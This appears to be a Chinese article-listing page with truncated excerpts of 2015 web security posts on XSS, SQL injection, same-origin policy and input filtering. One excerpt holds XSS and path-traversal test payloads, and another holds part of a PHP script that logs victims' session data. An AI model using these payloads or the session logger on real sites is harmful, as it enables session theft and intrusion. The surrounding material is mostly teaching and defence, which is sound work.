特别提示:补丁下载地址为:http://download.ecshop.com开头,该地址为ecmall下载站,如果非以http://download.ecshop.com开头,请勿下载,同时请反馈给管理员。1、修复修改任意用户密码 危险级 高2、修复sql注入漏洞 危险级 高3、修复团购页面xss...
分类:
其他好文 时间:
2015-02-25 23:34:47
阅读次数:
169
本文源自 https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29通过阅读和翻译,并按照自己的理解,整理成如下文档。概述XSS攻击是一种注入, 通过这种攻击,恶意脚本被注入到被信任的网站里。XSS攻击的表现是,攻击者使用web应用的...
分类:
其他好文 时间:
2015-02-25 01:50:47
阅读次数:
288
个人记录一、Web安全验证输入验证防范跨站脚本XSS攻击防止SQL注入图片验证码二、输入验证经典的安全法则:永远不要相信用户提交的数据验证内容:用户名,密码等格式验证长度防止数据库溢出错误邮件,手机,邮编等格式客户端:主要通过JavaScript来验证,过滤用户输入服务器端:检测用户输入的合法性,强...
分类:
Web程序 时间:
2015-02-22 21:52:15
阅读次数:
241
同源策略/SOP(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,浏览器很容易受到XSS、CSFR等攻击(可以参考我的这篇文章)。SOP要求两个通讯地址的协议、域名、端口号必须相同,否则两个地址的通讯将被浏览器视为不安全的,并被block下来...
分类:
Web程序 时间:
2015-02-19 15:04:52
阅读次数:
321
‘>=’>%3Cscript%3Ealert(‘XSS’)%3C/script%3E%0a%0a.jsp%22%3cscript%3ealert(%22xss%22)%3c/script%3e%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/p...
分类:
其他好文 时间:
2015-02-13 16:10:07
阅读次数:
863
".$time." = ".$ip."User Agent: ".$agent."Referer: ".$referer."Session: ".$data."";$file=fopen('vb.php','a');fwrite($file,$text);fclose($file);header("...
分类:
其他好文 时间:
2015-02-11 10:33:56
阅读次数:
135
从本章开始学习xss如何查找xss:拿到一个网站之后,随便找一个页面测试下http://xss.com/product/product_searchProducts.action?productName=111查看页面源代码为:添加一些变形,随便写(这里主要是看页面时如何构造语句的):把111变为:...
分类:
其他好文 时间:
2015-02-10 22:53:45
阅读次数:
152
一个网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面就讨论一下几种漏洞情况和防止攻击的办法.一.跨站脚本攻击(XSS) 跨站脚本攻击(XSS,Cross-site scripting)是最常见和基本的攻击WEB网站的方法。攻击者在网页上发布包含攻击性代码的数据。当浏览者看到此网页时,特....
分类:
Web程序 时间:
2015-02-10 10:53:27
阅读次数:
243
PHP清理跨站XSS xss_clean 函数 整理自codeigniter Security由Security Class 改编成函数xss_clean 单文件直接调用。BY吠品。//来自codeigniter 清理跨站XSS xss_clean//Security Class 改编成函数func...
分类:
Web程序 时间:
2015-02-09 12:43:40
阅读次数:
169
